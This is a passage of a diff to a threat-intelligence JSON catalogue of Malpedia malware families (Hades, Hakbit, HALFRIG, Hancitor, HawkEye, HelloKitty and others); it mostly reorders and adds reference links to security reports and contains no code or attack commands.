"https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/" + "https://www.telsy.com/download/5776/?uid=aca91e397e", + "https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://twitter.com/ItsReallyNick/status/1208141697282117633" ], "synonyms": [], "type": [] @@ -27012,9 +28290,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gwisin", + "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf", "https://asec.ahnlab.com/en/37483", - "https://asec.ahnlab.com/en/41565/", - "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf" + "https://asec.ahnlab.com/en/41565/" ], "synonyms": [], "type": [] @@ -27076,27 +28354,27 @@ "value": "HackSpy" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the \".~HL[5_random_characters] (first 5 characters of encryption password)\" extension.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hades", - "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.accenture.com/us-en/blogs/security/ransomware-hades", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/", "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-winter", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://twitter.com/inversecos/status/1381477874046169089?s=20", - "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", - "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/" + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://twitter.com/inversecos/status/1381477874046169089?s=20", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "http://www.secureworks.com/research/threat-profiles/gold-winter" ], "synonyms": [], "type": [] @@ -27109,26 +28387,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", - "https://www.justice.gov/usao-edny/press-release/file/1505981/download", + "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", + "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", + "https://securelist.com/cis-ransomware/104452/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/", + "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/", + "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/", "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants", - "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", - "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/", - "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/", - "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/", + "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://unit42.paloaltonetworks.com/prometheus-ransomware/", - "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/", - "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/", "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://securelist.com/cis-ransomware/104452/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", - "https://unit42.paloaltonetworks.com/thanos-ransomware/" + "https://www.justice.gov/usao-edny/press-release/file/1505981/download", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Thanos Ransomware" @@ -27138,13 +28416,26 @@ "uuid": "18617856-c6c4-45f8-995f-4916a1b45b05", "value": "Hakbit" }, + { + "description": "A stager used by APT29 to deploy CobaltStrike.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig", + "https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c89b2d7b-82b7-4329-81d0-ed99be4fad96", + "value": "HALFRIG" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", - "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/", "https://www.youtube.com/watch?v=FAFuSO9oAl0", + "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf", "https://www.youtube.com/watch?v=JPvcLLYR0tE" ], @@ -27160,46 +28451,46 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/", - "https://pid4.io/posts/how_to_write_a_hancitor_extractor/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", - "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8", - "https://www.malware-traffic-analysis.net/2021/09/29/index.html", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure", - "https://isc.sans.edu/diary/rss/27618", - "https://www.uperesia.com/hancitor-packer-demystified", - "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/", - "https://cyber-anubis.github.io/malware%20analysis/hancitor/", - "https://muha2xmad.github.io/malware-analysis/fullHancitor/", - "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", - "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/", - "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", - "https://blog.group-ib.com/hancitor-cuba-ransomware", - "https://muha2xmad.github.io/unpacking/hancitor/", - "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5", - "https://twitter.com/TheDFIRReport/status/1359669513520873473", - "https://blog.group-ib.com/prometheus-tds", - "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", - "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", - "https://malware-traffic-analysis.net/2021/09/29/index.html", - "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/", - "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://blog.group-ib.com/switching-side-jobs", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity", - "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", - "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" + "https://isc.sans.edu/diary/rss/27618", + "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/", + "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5", + "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", + "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/", + "https://malware-traffic-analysis.net/2021/09/29/index.html", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://blog.group-ib.com/prometheus-tds", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://cyber-anubis.github.io/malware%20analysis/hancitor/", + "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", + "https://muha2xmad.github.io/unpacking/hancitor/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping", + "https://pid4.io/posts/how_to_write_a_hancitor_extractor/", + "https://blog.group-ib.com/switching-side-jobs", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://www.malware-traffic-analysis.net/2021/09/29/index.html", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", + "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", + "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8", + "https://muha2xmad.github.io/malware-analysis/fullHancitor/", + "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure", + "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb", + "https://blog.group-ib.com/hancitor-cuba-ransomware", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor" ], "synonyms": [ "Chanitor" @@ -27226,8 +28517,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" ], "synonyms": [], "type": [] @@ -27256,8 +28547,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.haron", - "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", - "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b" + "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b", + "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/" ], "synonyms": [], "type": [] @@ -27284,10 +28575,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://www.f-secure.com/weblog/archives/00002718.html", "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "https://www.f-secure.com/weblog/archives/00002718.html", "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/" ], "synonyms": [], @@ -27301,11 +28592,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc", - "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace", - "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ", "https://github.com/HavocFramework/Havoc", + "https://4pfsec.com/havoc-c2-first-look/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ", "https://www.youtube.com/watch?v=ErPKP4Ms28s", - "https://4pfsec.com/havoc-c2-first-look/" + "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace", + "https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/" ], "synonyms": [ "Havokiz" @@ -27333,27 +28626,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", - "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", + "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", - "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", - "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html", - "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", - "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/", "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", + "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", - "http://www.secureworks.com/research/threat-profiles/gold-galleon" + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html" ], "synonyms": [ "HawkEye", @@ -27400,11 +28693,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip", - "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip", "https://cert.gov.ua/article/38097", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/", - "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine" + "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" ], "synonyms": [], "type": [] @@ -27430,8 +28723,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellobot", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html" + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt" ], "synonyms": [], "type": [] @@ -27444,28 +28737,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty", - "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://twitter.com/fwosar/status/1359167108727332868", "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/", - "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", + "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks", - "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7", - "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.ic3.gov/Media/News/2021/211029.pdf", - "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/", - "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", - "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/", "https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", - "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", + "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html", + "https://www.ic3.gov/Media/News/2021/211029.pdf", + "https://twitter.com/fwosar/status/1359167108727332868", "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/", - "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/" + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/", + "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7", + "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/" ], "synonyms": [ "KittyCrypt" @@ -27480,12 +28773,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability", - "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], "synonyms": [], @@ -27525,9 +28818,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" ], "synonyms": [], @@ -27541,16 +28834,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.malwarebytes.com/blog/news/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day", + "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", - "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html", - "https://www.youtube.com/watch?v=9nuo-AGg4p4", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", - "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/" + "https://www.youtube.com/watch?v=9nuo-AGg4p4", + "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html" ], "synonyms": [], "type": [] @@ -27563,79 +28857,80 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", - 